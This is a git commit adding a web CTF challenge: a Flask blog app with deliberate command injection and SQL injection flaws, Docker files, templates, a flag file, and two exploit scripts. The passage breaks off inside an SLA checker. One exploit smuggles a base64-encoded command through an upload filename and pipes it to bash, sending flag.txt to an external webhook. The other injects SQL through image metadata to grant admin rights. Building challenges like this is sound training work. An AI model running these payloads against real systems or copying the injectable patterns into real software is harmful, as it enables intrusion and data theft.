add blogpost and cdn chall

This commit is contained in:
Jonathan
2025-10-10 22:34:43 +07:00
parent ea02892f14
commit 2d51b73a1e
47 changed files with 1904 additions and 0 deletions
+15
View File
@@ -0,0 +1,15 @@
## Blogpost
db used: sqlite
flag.txt: GEMASTIK{random sha256 generated on app start}
feature:
[authentication required with login and register, register default as "user" role]
1. search feature
2. create, edit, visit post form that can upload images (png, jpg/jpeg, bmp) query the image metadata taken with exiftool to the sqlite database
3. profile (if the account type is admin, render the content of flag.txt)
vuln1: Command injection on exiftool (payload: exp1.py)
vuln2: SQLi on image metadata to enable altering user account into admin account (payload: sqli.png, exp2.py)
patching rules?:
+21
View File
@@ -0,0 +1,21 @@
FROM python:3.11-slim
RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y \
libimage-exiftool-perl \
sqlite3 \
build-essential \
&& rm -rf /var/lib/apt/lists/*
WORKDIR /app
COPY requirements.txt /app/
RUN pip install --no-cache-dir -r /app/requirements.txt
COPY . /app
RUN chmod +x /app/entrypoint.sh
RUN mkdir -p /data /app/uploads
EXPOSE 8000
CMD ["/app/entrypoint.sh"]
+248
View File
@@ -0,0 +1,248 @@
import os
import sqlite3
from flask import *
from werkzeug.utils import *
from werkzeug.security import generate_password_hash, check_password_hash
import hashlib
import re
from markupsafe import escape as m_escape
APP_DIR = os.path.dirname(os.path.abspath(__file__))
UPLOAD_FOLDER = os.path.join(APP_DIR, "uploads")
DB_PATH = "/data/app.db"
FLAG_PATH = "/app/flag.txt"
ALLOWED_EXT = {'png', 'jpg', 'jpeg', 'bmp'}
app = Flask(__name__)
app.secret_key = os.urandom(24)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 5 * 1024 * 1024
def get_db():
db = getattr(g, "_database", None)
if db is None:
db = g._database = sqlite3.connect(DB_PATH, check_same_thread=False)
db.row_factory = sqlite3.Row
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, "_database", None)
if db is not None:
db.close()
@app.route("/register", methods=["GET", "POST"])
def register():
if request.method == "POST":
username = request.form.get("username", "").strip()
password = request.form.get("password", "").strip()
if not username or not password:
flash("Missing username or password")
return redirect(url_for("register"))
hashed = generate_password_hash(password)
db = get_db()
try:
db.execute("INSERT INTO users (username, password, role) VALUES (?, ?, ?)", (username, hashed, "user"))
db.commit()
flash("Registered. Please login.")
return redirect(url_for("login"))
except sqlite3.IntegrityError:
flash("Username already taken")
return redirect(url_for("register"))
return render_template("register.html")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
username = request.form.get("username", "").strip()
password = request.form.get("password", "").strip()
db = get_db()
cur = db.execute("SELECT id, username, password, role FROM users WHERE username = ?", (username,))
row = cur.fetchone()
if row and check_password_hash(row["password"], password):
session["user_id"] = row["id"]
session["username"] = row["username"]
session["role"] = row["role"]
flash("Logged in")
return redirect(url_for("index"))
else:
flash("Invalid credentials")
return render_template("login.html")
@app.route("/logout")
def logout():
session.clear()
flash("Logged out")
return redirect(url_for("index"))
@app.route("/", methods=["GET", "POST"])
def index():
if "user_id" not in session:
return redirect(url_for("login"))
user_id = session["user_id"]
db = get_db()
q = request.values.get("q", "").strip()
if q:
cur = db.execute(
"SELECT p.*, u.username AS author "
"FROM posts p LEFT JOIN users u ON p.author_id = u.id "
"WHERE p.author_id = ? AND (p.title LIKE ? OR p.content LIKE ?) "
"ORDER BY p.id DESC",
(user_id, f"%{q}%", f"%{q}%")
)
else:
cur = db.execute(
"SELECT p.*, u.username AS author "
"FROM posts p LEFT JOIN users u ON p.author_id = u.id "
"WHERE p.author_id = ? "
"ORDER BY p.id DESC",
(user_id,)
)
posts = cur.fetchall()
return render_template("index.html", posts=posts, q=q)
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXT
@app.route("/create", methods=["GET", "POST"])
def create_post():
if "user_id" not in session:
flash("Login required")
return redirect(url_for("login"))
if request.method == "POST":
title = request.form.get("title", "")
content = request.form.get("content", "")
file = request.files.get("image")
image_filename = None
metadata_text = ""
if file and allowed_file(file.filename):
original_filename = file.filename
save_path = os.path.join(app.config['UPLOAD_FOLDER'], original_filename)
os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
file.save(save_path)
try:
cmd = f"exiftool {save_path}"
meta_file = save_path + ".meta"
full_cmd = f"{cmd} > {meta_file} 2>&1"
os_status = os.system(full_cmd)
if os.path.exists(meta_file):
with open(meta_file, "r", encoding="utf-8", errors="ignore") as mf:
metadata_text = mf.read()
else:
metadata_text = "no-metadata"
except Exception as e:
metadata_text = f"exif_err: {e}"
try:
h = hashlib.sha256()
with open(save_path, "rb") as fbin:
for chunk in iter(lambda: fbin.read(8192), b""):
h.update(chunk)
digest = h.hexdigest()
_, ext = os.path.splitext(original_filename)
ext = ext.lower() if ext else ""
new_filename = f"{digest}{ext}"
new_path = os.path.join(app.config['UPLOAD_FOLDER'], new_filename)
new_meta = new_path + ".meta"
if not os.path.exists(new_path):
os.replace(save_path, new_path)
else:
try:
os.remove(save_path)
except Exception:
pass
if os.path.exists(meta_file):
try:
os.replace(meta_file, new_meta)
except Exception:
try:
with open(meta_file, "rb") as mf_src, open(new_meta, "wb") as mf_dst:
mf_dst.write(mf_src.read())
os.remove(meta_file)
except Exception:
pass
image_filename = new_filename
if os.path.exists(new_meta):
try:
with open(new_meta, "r", encoding="utf-8", errors="ignore") as mf2:
metadata_text = mf2.read()
except Exception:
pass
except Exception as e:
image_filename = original_filename
db = get_db()
try:
cur = db.execute(
"INSERT INTO posts (title, content, image_filename, author_id) VALUES (?, ?, ?, ?)",
(title, content, image_filename, session['user_id'])
)
db.commit()
post_id = cur.lastrowid
metadata_insert = f"UPDATE posts SET metadata = '{metadata_text}' WHERE id = {post_id};"
db.executescript(metadata_insert)
db.commit()
except Exception as e:
db.execute(
"UPDATE posts SET metadata = ? WHERE id = ?",
(metadata_text, post_id if 'post_id' in locals() else None)
)
db.commit()
flash("Post created")
return redirect(url_for("index"))
else:
flash("Missing or invalid image (png/jpg/jpeg/bmp)")
return render_template("create_post.html")
@app.route('/uploads/<path:filename>')
def uploaded_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
@app.route("/post/<int:pid>")
def view_post(pid):
db = get_db()
cur = db.execute(
"SELECT p.*, u.username as author FROM posts p LEFT JOIN users u ON p.author_id = u.id WHERE p.id = ?",
(pid,)
)
post = cur.fetchone()
if not post:
abort(404)
return render_template("view_post.html", post=post)
@app.route("/profile")
def profile():
if "user_id" not in session:
flash("Login required")
return redirect(url_for("login"))
db = get_db()
cur = db.execute("SELECT id, username, role FROM users WHERE id = ?", (session["user_id"],))
user = cur.fetchone()
flag_content = None
with open(os.path.join(APP_DIR, "templates", "profile.html"), "r", encoding="utf-8") as fh:
profile_template = fh.read()
username = user["username"] if user else ""
profile_source = profile_template.replace("{{ user.username }}", username)
if user and user["role"] == "admin":
try:
with open(FLAG_PATH, "r") as f:
flag_content = f.read().strip()
except Exception:
flag_content = "flag not found"
return render_template_string(profile_source, user=user, flag=flag_content)
if __name__ == "__main__":
os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
app.run(host="0.0.0.0", port=8000)
Binary file not shown.
+1
View File
@@ -0,0 +1 @@
GEMASTIK{e4666237005e8f8699f0c02ca95b8e4fa5064c93d91c67070649c6e279c13670}
@@ -0,0 +1,10 @@
version: '3.8'
services:
web:
build: .
container_name: ctf_web
ports:
- "4413:8000"
environment:
- FLASK_ENV=production
command: ["/app/entrypoint.sh"]
+22
View File
@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -e
FLAG_SHA=$(head -c 64 /dev/urandom | sha256sum | awk '{print $1}')
FLAG="GEMASTIK{${FLAG_SHA}}"
echo "$FLAG" > /app/flag.txt
chmod 400 /app/flag.txt
mkdir -p /app/uploads
mkdir -p /data
DBFILE=/data/app.db
if [ ! -f "$DBFILE" ]; then
echo "Initializing database..."
sqlite3 $DBFILE < /app/init_db.sql
fi
echo "Starting Flask app (port 8000)..."
export FLASK_APP=/app/app.py
export FLASK_ENV=production
python /app/app.py
+18
View File
@@ -0,0 +1,18 @@
PRAGMA foreign_keys = ON;
CREATE TABLE users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT UNIQUE NOT NULL,
password TEXT NOT NULL,
role TEXT NOT NULL DEFAULT 'user'
);
CREATE TABLE posts (
id INTEGER PRIMARY KEY AUTOINCREMENT,
title TEXT,
content TEXT,
image_filename TEXT,
metadata TEXT,
author_id INTEGER,
FOREIGN KEY(author_id) REFERENCES users(id)
);
+3
View File
@@ -0,0 +1,3 @@
Flask==2.2.5
werkzeug==2.2.3
Jinja2==3.1.2
+160
View File
@@ -0,0 +1,160 @@
/* cool dark glass UI for the CTF blog */
/* Variables */
:root{
--bg-900: #0b0e12;
--bg-800: #0f1720;
--panel: rgba(255,255,255,0.04);
--glass: rgba(255,255,255,0.04);
--muted: rgba(255,255,255,0.6);
--accent-1: #6EE7B7; /* mint */
--accent-2: #7C4DFF; /* violet */
--danger: #FF6B6B;
--radius-lg: 14px;
--radius-md: 10px;
--shadow-1: 0 6px 20px rgba(2,6,23,0.6);
--card-border: linear-gradient(120deg, rgba(124,77,255,0.18), rgba(110,231,183,0.12));
}
*{box-sizing:border-box}
html,body{height:100%}
body{
font-family: Inter, ui-sans-serif, system-ui, -apple-system, "Segoe UI", Roboto, "Helvetica Neue", Arial;
background: radial-gradient(1200px 600px at 10% 10%, rgba(124,77,255,0.06), transparent),
radial-gradient(900px 400px at 90% 90%, rgba(110,231,183,0.03), transparent),
linear-gradient(180deg,var(--bg-900),var(--bg-800));
color: #e6eef6;
margin:0;
-webkit-font-smoothing:antialiased;
-moz-osx-font-smoothing:grayscale;
padding:28px;
line-height:1.45;
}
header{
display:flex;
gap:18px;
align-items:center;
justify-content:space-between;
max-width:1100px;
margin:0 auto 22px;
padding:14px 18px;
border-radius:var(--radius-lg);
background: linear-gradient(180deg, rgba(255,255,255,0.03), rgba(255,255,255,0.01));
box-shadow: var(--shadow-1);
border: 1px solid rgba(255,255,255,0.03);
backdrop-filter: blur(8px) saturate(120%);
}
header h1{
margin:0;
font-size:20px;
letter-spacing:0.4px;
display:flex;
gap:10px;
align-items:center;
}
.logo-dot{
width:12px;height:12px;border-radius:50%;
background: conic-gradient(from 180deg at 50% 50%, var(--accent-1), var(--accent-2));
box-shadow:0 4px 18px rgba(124,77,255,0.18), inset 0 -2px 6px rgba(255,255,255,0.04);
}
/* nav */
nav a{
color:var(--muted);
text-decoration:none;
padding:8px 12px;
border-radius:10px;
font-size:14px;
}
nav a:hover{ color: white; background: rgba(255,255,255,0.03) }
nav a.active{
background: linear-gradient(90deg, rgba(124,77,255,0.12), rgba(110,231,183,0.08));
color: white;
box-shadow: 0 6px 18px rgba(2,6,23,0.5);
}
main{
max-width:1100px;
margin: 18px auto;
display:grid;
grid-template-columns: 1fr;
gap:18px;
}
form, article, .card{
background: linear-gradient(180deg, rgba(255,255,255,0.02), rgba(255,255,255,0.01));
border-radius: var(--radius-md);
padding:16px;
border: 1px solid rgba(255,255,255,0.03);
box-shadow: 0 8px 30px rgba(2,6,23,0.45);
}
input[type="text"], input[type="password"], textarea, input[type="file"], select {
width:100%;
padding:10px 12px;
border-radius:8px;
background: rgba(255,255,255,0.02);
border:1px solid rgba(255,255,255,0.04);
color: #e6eef6;
outline:none;
font-size:14px;
margin-top:6px;
}
textarea{ min-height:120px; resize:vertical; }
button, .btn {
display:inline-block;
padding:10px 14px;
border-radius:10px;
border: none;
cursor:pointer;
font-weight:600;
background: linear-gradient(90deg, var(--accent-1), var(--accent-2));
color: #04111a;
transition: transform .12s ease, box-shadow .12s ease, opacity .12s;
box-shadow: 0 8px 20px rgba(124,77,255,0.12);
}
button:hover, .btn:hover{ transform: translateY(-2px); box-shadow: 0 14px 32px rgba(124,77,255,0.14) }
button.ghost{
background: transparent; color: var(--muted); border:1px solid rgba(255,255,255,0.04);
}
article h3{ margin:0 0 6px; font-size:18px }
article p { color: var(--muted); margin:6px 0; }
article img{ border-radius:8px; max-width:100%; display:block; margin:10px 0; border:1px solid rgba(255,255,255,0.03) }
pre{
background: linear-gradient(180deg, rgba(255,255,255,0.012), rgba(255,255,255,0.01));
border-radius:8px; padding:12px; overflow:auto; color:#cfeff1;
font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, "Roboto Mono", "Courier New", monospace;
font-size:13px; border:1px solid rgba(255,255,255,0.03);
}
ul{ list-style:none; padding:0; margin:0 0 10px 0; display:flex; gap:8px; flex-wrap:wrap }
ul li{
background: linear-gradient(90deg, rgba(124,77,255,0.12), rgba(110,231,183,0.07));
padding:8px 10px; border-radius:10px; color:#eafbf6; font-weight:600;
}
footer{ max-width:1100px; margin:18px auto; color:var(--muted); font-size:13px; text-align:center }
@media (min-width:900px){
main{ grid-template-columns: 1fr 360px; align-items:start; }
}
.label-muted{ color:var(--muted); font-size:13px }
.badge{
display:inline-block; padding:6px 10px; border-radius:999px; font-weight:700; font-size:12px;
background: linear-gradient(90deg, rgba(124,77,255,0.12), rgba(110,231,183,0.06)); color:#e6fef0;
}
.file-wrap{
display:flex; gap:12px; align-items:center;
}
.file-wrap input[type=file]{ display:none; }
.file-btn{
display:inline-flex; align-items:center; gap:8px; padding:8px 12px; border-radius:8px;
background: rgba(255,255,255,0.02); border:1px dashed rgba(255,255,255,0.04); color:var(--muted);
}
:focus{ outline: 3px solid rgba(124,77,255,0.12); outline-offset:3px }
@@ -0,0 +1,82 @@
{% extends "layout.html" %}
{% block content %}
<link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
<div class="card" style="padding:20px; max-width:900px; margin:auto;">
<h2 style="margin-top:0">Create post (upload image)</h2>
<form method="post" enctype="multipart/form-data" class="card" style="padding:16px; gap:12px; display:flex; flex-direction:column;">
<label>
<div class="label-muted">Title</div>
<input name="title" placeholder="Post title" type="text">
</label>
<label>
<div class="label-muted">Content</div>
<textarea name="content" rows="6" placeholder="Write something..."></textarea>
</label>
<div>
<div class="label-muted" style="margin-bottom:6px;">Image</div>
<div class="file-wrap" style="align-items:center;">
<label class="file-btn" for="image">Choose image</label>
<span class="label-muted" id="file-name">No file chosen</span>
<input id="image" type="file" name="image" accept=".png,.jpg,.jpeg,.bmp" onchange="handleFileChange(this)">
</div>
<div id="preview-wrap" style="margin-top:12px; display:none;">
<div class="label-muted" style="margin-bottom:6px;">Preview</div>
<img id="preview" alt="preview" style="max-width:320px; border-radius:8px; border:1px solid rgba(255,255,255,0.03);">
</div>
</div>
<div style="display:flex; gap:10px; align-items:center;">
<button class="btn" type="submit">Create</button>
<button type="button" class="button ghost" onclick="resetFile()" style="background:transparent; color:var(--muted); border:1px solid rgba(255,255,255,0.04); padding:8px 12px; border-radius:8px;">
Clear file
</button>
</div>
</form>
</div>
<script>
function handleFileChange(input) {
const file = input.files && input.files[0];
const nameSpan = document.getElementById('file-name');
const previewWrap = document.getElementById('preview-wrap');
const preview = document.getElementById('preview');
if (!file) {
nameSpan.innerText = 'No file chosen';
previewWrap.style.display = 'none';
preview.src = '';
return;
}
nameSpan.innerText = file.name;
if (file.type.startsWith('image/')) {
const reader = new FileReader();
reader.onload = function(e) {
preview.src = e.target.result;
previewWrap.style.display = 'block';
};
reader.readAsDataURL(file);
} else {
previewWrap.style.display = 'none';
preview.src = '';
}
}
function resetFile() {
const input = document.getElementById('image');
input.value = '';
document.getElementById('file-name').innerText = 'No file chosen';
document.getElementById('preview-wrap').style.display = 'none';
document.getElementById('preview').src = '';
}
</script>
{% endblock %}
@@ -0,0 +1,120 @@
{% extends "layout.html" %}
{% block content %}
<link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
<style>
/* Small, page-specific responsive tweaks (safe to keep) */
.posts-container{
max-width:1200px;
margin:18px auto;
padding:0 16px;
}
/* responsive grid: auto-fit columns, each at least 320px wide */
.posts-grid{
display: grid;
gap: 16px;
grid-template-columns: repeat(auto-fit, minmax(320px, 1fr));
align-items: start;
}
/* each post card is a flexible grid: image column (if present) + content */
.post-card{
display: grid;
grid-template-columns: 160px 1fr;
gap: 14px;
align-items: start;
padding: 14px;
min-height: 120px;
}
/* if no image, make content span full width */
.post-card.no-image{
grid-template-columns: 1fr;
}
/* thumbnail styling */
.post-card img{
width:100%;
height:120px;
object-fit:cover;
border-radius:8px;
display:block;
border:1px solid rgba(255,255,255,0.03);
}
/* small adjustments for tighter screens */
@media (max-width:640px){
.post-card{ grid-template-columns: 1fr; }
.post-card img{ height:200px; }
}
</style>
<div class="posts-container">
<!-- Search -->
<form method="GET" action="{{ url_for('index') }}" style="display:flex; gap:10px; margin-bottom:14px;">
<input name="q" placeholder="Search posts..." value="{{ q|default('') }}" style="flex:1; padding:10px 12px; border-radius:10px; border:1px solid rgba(255,255,255,0.03); background:rgba(255,255,255,0.02); color:inherit;">
<button class="btn" type="submit" style="min-width:100px;">Search</button>
</form>
<h2 style="margin:0 0 12px 0">Posts</h2>
<div class="posts-grid">
{% for p in posts %}
{# determine if image exists to add no-image class #}
<article class="card post-card {% if not p['image_filename'] %}no-image{% endif %}">
{% if p['image_filename'] %}
<div>
<a href="{{ url_for('view_post', pid=p['id']) }}">
<img src="{{ url_for('uploaded_file', filename=p['image_filename']) }}" alt="img">
</a>
</div>
{% endif %}
<div>
<h3 style="margin:0 0 6px 0; font-size:18px;">
<a href="{{ url_for('view_post', pid=p['id']) }}" style="color:inherit; text-decoration:none;">
{{ p['title'] or 'Untitled' }}
</a>
</h3>
<div style="display:flex; gap:8px; align-items:center; margin-bottom:8px;">
<span class="label-muted">By {{ p['author'] or 'unknown' }}</span>
{% if p['author'] and p['author'] == session.get('username') %}
<span class="badge">you</span>
{% endif %}
</div>
<p style="margin:0 0 10px 0; color:var(--muted);">
{% if p['content'] %}
{{ (p['content'][:200] + '...') if p['content']|length > 200 else p['content'] }}
{% else %}
<span class="label-muted">No content</span>
{% endif %}
</p>
<div style="display:flex; gap:10px; align-items:center; margin-top:8px;">
<a class="btn" href="{{ url_for('view_post', pid=p['id']) }}" style="padding:8px 12px; font-size:14px;">Read</a>
<span class="label-muted" style="font-size:13px;">Post ID: {{ p['id'] }}</span>
</div>
</div>
</article>
{% else %}
<div class="card" style="text-align:center; padding:24px;">
<p style="margin:0; color:var(--muted);">No posts yet.</p>
</div>
{% endfor %}
</div>
</div>
<script>
(function(){
const q = document.querySelector('input[name="q"]');
if (q) q.focus();
})();
</script>
{% endblock %}
@@ -0,0 +1,44 @@
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>Blogpost</title>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;600;800&display=swap" rel="stylesheet">
<link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
</head>
<body>
<header>
<h1>Blogpost</h1>
<nav>
<a href="{{ url_for('index') }}">Home</a>
{% if session.get('user_id') %}
<a href="{{ url_for('create_post') }}">Create</a>
<a href="{{ url_for('profile') }}">Profile</a>
<a href="{{ url_for('logout') }}">Logout ({{ session.get('username') }})</a>
{% else %}
<a href="{{ url_for('login') }}">Login</a>
<a href="{{ url_for('register') }}">Register</a>
{% endif %}
</nav>
</header>
<main>
{% with messages = get_flashed_messages() %}
{% if messages %}
<ul>
{% for m in messages %}
<li>{{ m }}</li>
{% endfor %}
</ul>
{% endif %}
{% endwith %}
{% block content %}{% endblock %}
</main>
<footer>
<small>keii</small>
</footer>
</body>
</html>
@@ -0,0 +1,75 @@
{% extends "layout.html" %}
{% block content %}
<!-- safe to include even if layout already loads it -->
<link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
<div style="max-width:520px; margin:28px auto;">
{% with messages = get_flashed_messages() %}
{% if messages %}
<ul>
{% for m in messages %}
<li>{{ m }}</li>
{% endfor %}
</ul>
{% endif %}
{% endwith %}
<div class="card" style="padding:22px;">
<h2 style="margin-top:0">Login</h2>
<form method="post" action="{{ url_for('login') }}" style="display:flex; flex-direction:column; gap:12px;">
<label>
<div class="label-muted">Username</div>
<input name="username" id="username" type="text" placeholder="your username" required>
</label>
<label>
<div class="label-muted" style="display:flex; justify-content:space-between; align-items:center;">
<span>Password</span>
<a href="{{ url_for('register') }}" style="font-size:13px; color:var(--muted); text-decoration:none;">Create account</a>
</div>
<div style="position:relative;">
<input name="password" id="password" type="password" placeholder="your password" required style="padding-right:92px;">
<button type="button" id="pw-toggle" style="position:absolute; right:6px; top:6px; height:36px; border-radius:8px; border:1px solid rgba(255,255,255,0.04); background:transparent; color:var(--muted); padding:6px 10px; cursor:pointer;">
Show
</button>
</div>
</label>
<div style="display:flex; gap:10px; align-items:center; justify-content:space-between;">
<label style="display:flex; gap:8px; align-items:center; font-size:14px; color:var(--muted);">
<input type="checkbox" name="remember" style="width:16px; height:16px;">
Remember
</label>
<button class="btn" type="submit" style="min-width:120px;">Login</button>
</div>
</form>
</div>
</div>
<script>
// autofocus username
document.getElementById('username')?.focus();
// password toggle
(function(){
const pw = document.getElementById('password');
const btn = document.getElementById('pw-toggle');
if (!pw || !btn) return;
btn.addEventListener('click', () => {
if (pw.type === 'password') {
pw.type = 'text';
btn.innerText = 'Hide';
} else {
pw.type = 'password';
btn.innerText = 'Show';
}
pw.focus();
});
})();
</script>
{% endblock %}
@@ -0,0 +1,12 @@
{% extends "layout.html" %}
{% block content %}
<h2>Profile: {{ user['username'] }}</h2>
<p>Role: {{ user['role'] }}</p>
{% if flag %}
<h3>FLAG (admin only):</h3>
<pre>{{ flag }}</pre>
{% else %}
<p>No special access.</p>
{% endif %}
{% endblock %}
@@ -0,0 +1,66 @@
{% extends "layout.html" %}
{% block content %}
<link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
<div style="max-width:520px; margin:28px auto;">
{% with messages = get_flashed_messages() %}
{% if messages %}
<ul>
{% for m in messages %}
<li>{{ m }}</li>
{% endfor %}
</ul>
{% endif %}
{% endwith %}
<div class="card" style="padding:22px;">
<h2 style="margin-top:0">Register</h2>
<form method="post" action="{{ url_for('register') }}" style="display:flex; flex-direction:column; gap:12px;">
<label>
<div class="label-muted">Username</div>
<input name="username" id="reg-username" type="text" placeholder="choose a username" required>
</label>
<label>
<div class="label-muted">Password</div>
<div style="position:relative;">
<input name="password" id="reg-password" type="password" placeholder="create a password" required style="padding-right:92px;">
<button type="button" id="reg-pw-toggle" style="position:absolute; right:6px; top:6px; height:36px; border-radius:8px; border:1px solid rgba(255,255,255,0.04); background:transparent; color:var(--muted); padding:6px 10px; cursor:pointer;">
Show
</button>
</div>
</label>
<div style="display:flex; gap:10px; align-items:center; justify-content:flex-end;">
<a href="{{ url_for('login') }}" class="label-muted" style="text-decoration:none; color:var(--muted);">Already have an account?</a>
<button class="btn" type="submit" style="min-width:120px;">Register</button>
</div>
</form>
</div>
</div>
<script>
// autofocus username
document.getElementById('reg-username')?.focus();
// password toggle
(function(){
const pw = document.getElementById('reg-password');
const btn = document.getElementById('reg-pw-toggle');
if (!pw || !btn) return;
btn.addEventListener('click', () => {
if (pw.type === 'password') {
pw.type = 'text';
btn.innerText = 'Hide';
} else {
pw.type = 'password';
btn.innerText = 'Show';
}
pw.focus();
});
})();
</script>
{% endblock %}
@@ -0,0 +1,13 @@
{% extends "layout.html" %}
{% block content %}
<article>
<h2>{{ post['title'] or 'Untitled' }}</h2>
<p>By {{ post['author'] or 'unknown' }}</p>
{% if post['image_filename'] %}
<img src="{{ url_for('uploaded_file', filename=post['image_filename']) }}" style="max-width:400px">
{% endif %}
<p>{{ post['content'] }}</p>
</article>
{% endblock %}
BIN
View File
Binary file not shown.
+63
View File
@@ -0,0 +1,63 @@
#!/usr/bin/env python3
import requests
from pathlib import Path
import random
import string
HOST = "http://localhost:4413"
REGISTER_URL = HOST + "/register"
LOGIN_URL = HOST + "/login"
CREATE_URL = HOST + "/create"
HOME_URL = HOST + "/"
PROFILE_URL = HOST + "/profile"
LOCAL_IMAGE = "test.png" # a valid image file on your machine
# Generate random username and password
def generate_random_string(length=8):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
USERNAME = generate_random_string()
PASSWORD = generate_random_string()
# choose payload variant: either use subshell $() or backticks `...`
filename_payload = "tes.png; echo 'cHl0aG9uMyAtYyAiaW1wb3J0IHVybGxpYi5yZXF1ZXN0OyB1cmxsaWIucmVxdWVzdC51cmxvcGVuKCdodHRwczovL3dlYmhvb2suc2l0ZS8yNjcxZjg2Zi0xN2U4LTRiNDQtODFkYS00YWQ2ZDUyMTA0OWQnLCBkYXRhPW9wZW4oJ2ZsYWcudHh0JywgJ3JiJykucmVhZCgpKSI=' | base64 -d | bash;#.jpg"
# choose which to use:
filename_payload = filename_payload # or payload_backticks
s = requests.Session()
r = s.post(REGISTER_URL, data={"username": USERNAME, "password": PASSWORD})
if r.status_code != 200:
print("Registration failed. Status:", r.status_code)
# print("Response:", r.text[:400])
exit(1)
else:
print(f"Registered user: {USERNAME}")
r = s.post(LOGIN_URL, data={"username": USERNAME, "password": PASSWORD})
if r.status_code != 200:
print("Login request status:", r.status_code)
print("Response:", r.text[:400])
else:
print("Login attempted. Cookies:", s.cookies.get_dict())
# 2) upload file with crafted filename in multipart
img_path = Path(LOCAL_IMAGE)
if not img_path.exists():
raise SystemExit(f"Local image {LOCAL_IMAGE} not found")
with open(img_path, "rb") as fh:
# requests allows sending a custom filename (first item in tuple)
files = {
"image": (filename_payload, fh, "image/jpeg")
}
data = {"title": "tes payload python3 base64 cat to curl", "content": "ctf"}
r = s.post(CREATE_URL, data=data, files=files)
print("Upload response:", r.status_code)
# optionally print a bit of response to see if anything obvious happened
print(r.text[:800])
# 3) fetch profile to see if you are admin and flag is shown
r = s.get(PROFILE_URL)
print("Profile status:", r.status_code)
print(r.text[:1200])
+95
View File
@@ -0,0 +1,95 @@
import requests
import random
import string
import re
import subprocess
from pathlib import Path
print("SQLi (VULN 2) Exploit")
HOST = "http://localhost:4413"
REGISTER_URL = HOST + "/register"
LOGIN_URL = HOST + "/login"
CREATE_URL = HOST + "/create"
HOME_URL = HOST + "/"
PROFILE_URL = HOST + "/profile"
# Generate random username and password
def generate_random_string(length=8):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
USERNAME = generate_random_string()
PASSWORD = generate_random_string()
LOCAL_IMAGE = "sqli.png" # Image to be modified with SQLi payload
# 1) Modify the image with exiftool to embed SQLi payload
sqli_payload = f"a'; UPDATE users SET role='admin' WHERE username='{USERNAME}';--"
try:
subprocess.run([
"exiftool",
"-overwrite_original",
f"-Comment={sqli_payload}",
LOCAL_IMAGE
], check=True)
print(f"Modified {LOCAL_IMAGE} with SQLi payload in Comment metadata")
except subprocess.CalledProcessError as e:
print(f"Failed to modify image with exiftool: {e}")
exit(1)
s = requests.Session()
# 2) Register a new user
r = s.post(REGISTER_URL, data={"username": USERNAME, "password": PASSWORD})
if r.status_code != 200:
print("Registration failed. Status:", r.status_code)
# print("Response:", r.text[:400])
exit(1)
else:
print(f"Registered user: {USERNAME}")
# 3) Login with the new user
r = s.post(LOGIN_URL, data={"username": USERNAME, "password": PASSWORD})
if r.status_code != 200:
print("Login failed. Status:", r.status_code)
# print("Response:", r.text[:400])
exit(1)
else:
print("Logged in successfully. Cookies:", s.cookies.get_dict())
# 4) Upload the modified sqli.png image when creating a post
img_path = Path(LOCAL_IMAGE)
if not img_path.exists():
raise SystemExit(f"Local image {LOCAL_IMAGE} not found")
with open(img_path, "rb") as fh:
files = {
"image": (LOCAL_IMAGE, fh, "image/png")
}
data = {"title": "SQLi Exploit", "content": "Testing SQLi payload"}
r = s.post(CREATE_URL, data=data, files=files)
print("Upload response status:", r.status_code)
# print("Upload response:", r.text[:800])
# 5) Get the home page to find the newest post ID
r = s.get(HOME_URL)
print("Home page status:", r.status_code)
# Extract post IDs using regex
post_ids = re.findall(r'/post/(\d+)', r.text)
if post_ids:
max_id = max(map(int, post_ids))
print(f"Newest post ID: {max_id}")
else:
print("No post IDs found on home page.")
exit(1)
# 6) Visit the profile page and search for the flag
r = s.get(PROFILE_URL)
print("Profile page status:", r.status_code)
flag_pattern = r"GEMASTIK\{.*?\}"
flag = re.search(flag_pattern, r.text)
if flag:
print("Flag found:", flag.group(0))
else:
print("Flag not found in response.")
# print("Response snippet:", r.text[:1200])
Binary file not shown.

After

Width:  |  Height:  |  Size: 1012 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1012 KiB

+250
View File
@@ -0,0 +1,250 @@
import io
import re
import time
import json
import base64
import random
import string
import logging
import subprocess
from typing import Optional
import requests
from PIL import Image # pillow for tiny PNG generation
from .Challenge import Challenge
class WebAppSLA(Challenge):
"""
SLA checker for the provided Flask challenge app.
Assumptions / Defaults (override as needed):
- Service listens on self.port (inherited)
- Container name is 'chal_app' (override via self.container_name)
- Flag lives in '/app/flag.txt' inside container
- Login flow at /login, register at /register
- Create post at /create, view post at /post/<id>, uploads at /uploads/<file>
"""
flag_location = 'flags/webapp.txt' # Host copy (used by your orchestrator)
history_location = 'history/webapp.txt'
container_flag_path = '/app/flag.txt'
container_name = 'chal_app' # <-- set to your actual container name
# Heuristics to recognize ExifTool output
_exif_markers = (
'ExifTool Version Number',
'File Name',
'File Size',
'MIME Type',
'File Type',
)
def _make_logger(self):
if not hasattr(self, 'logger') or self.logger is None:
self.logger = logging.getLogger(self.__class__.__name__)
if not self.logger.handlers:
h = logging.StreamHandler()
h.setFormatter(logging.Formatter('[%(levelname)s] %(message)s'))
self.logger.addHandler(h)
self.logger.setLevel(logging.INFO)
# --- Flag distribution hook (optional, mirrors your example) ---
def distribute(self, flag: str) -> bool:
"""
